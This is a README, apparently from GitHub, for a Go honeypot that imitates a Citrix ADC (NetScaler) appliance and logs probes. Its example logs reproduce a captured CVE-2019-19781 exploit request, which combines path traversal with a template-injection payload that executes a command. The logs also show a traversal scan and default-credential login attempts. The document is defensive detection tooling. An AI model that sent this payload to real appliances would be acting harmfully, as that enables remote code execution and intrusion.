Citrix ADC (NetScaler) Honeypot. Supports detection for CVE-2019-19781 and login attempts
haxrob/citrix-honeypot
Citrix ADC (NetScaler) Honeypot

  • Detects and logs payloads for CVE-2019-19781 (Shitrix / Citrixmash)
  • Logs failed login attempts
  • Serves content and headers taken from a real appliance, to increase the chance of being indexed by search engines (e.g. Google, Shodan)


Installation

Precompiled

A precompiled Linux (x64) package is available from the project's releases:

mkdir citrix-honeypot
cd citrix-honeypot
wget https://github.com/x1sec/citrix-honeypot/releases/download/v0.02/citrix-honeypot-linux-amd64.tar.gz
tar -xf citrix-honeypot-linux-amd64.tar.gz

go get

If you have a Go environment ready to go:

go get github.com/x1sec/citrix-honeypot

Running

Generate a self-signed certificate (note that both key commands below write to server.key, so the second one overwrites the RSA key with an EC key; either key on its own is sufficient):

openssl genrsa -out server.key 2048
openssl ecparam -genkey -name secp384r1 -out server.key
openssl req -new -x509 -sha256 -key server.key -out server.crt -days 3650

Then it's as easy as:

./citrix-honeypot

The honeypot listens on both port 80 and port 443, so it must be run as the root user (or otherwise be allowed to bind privileged ports).

Or to detach and run as a background process:

nohup ./citrix-honeypot &

Logs

Results are written to the ./log directory as the following files:

hits.log - Scanning and exploitation attempts, with the full request data (e.g. headers, POST body)

all.log - All HTTP requests observed by the server

logins.log - Attempted logins to the web interface

tlsErrors.log - Internet scanners often send invalid data to port 443; the resulting TLS/HTTPS errors are logged here.

Examples

Log entry produced when the first publicly released exploit is run against the honeypot:

$ cat logs/hits.log 
2020/01/23 08:27:55 
-------------------
Exploitation detected ...
src: xxx.xxx.xxx.xxx
POST /vpn/../vpns/portal/scripts/newbm.pl HTTP/2.0
Host: xxx.xxx.xxx.xxx
Accept: */*
Content-Length: 181
Content-Type: application/x-www-form-urlencoded
Nsc_nonce: test1337
Nsc_user: /../../../../../../../../../../netscaler/portal/templates/zToMJRAzp0T0FuUS2cEp41ZZbmrtmUqS
User-Agent: curl/7.67.0

url=http://example.com\&title=[%25+template.new({'BLOCK'%3d'exec(\'id | tee /netscaler/portal/templates/zToMJRAzp0T0FuUS2cEp41ZZbmrtmUqS.xml\')%3b'})+%25]\&desc=test\&UI_inuse=RfWeb

Scanning attempt:

$ cat logs/hits.log 
2020/01/23 08:41:02 
-------------------
Scanning detected ... 
src: xxx.xxx.xxx.xxx
GET /vpn/../vpns/cfg/smb.conf HTTP/2.0
Host: xxx.xxx.xxx.xxx
Accept: */*
User-Agent: curl/7.67.0

Login attempts:

$ cat logs/logins.log
2020/01/23 07:26:03 Failed login from xxx.xxx.xxx.xxx user:nsroot pass:nsroot
2020/01/23 08:26:03 Failed login from xxx.xxx.xxx.xxx user:admin pass:admin
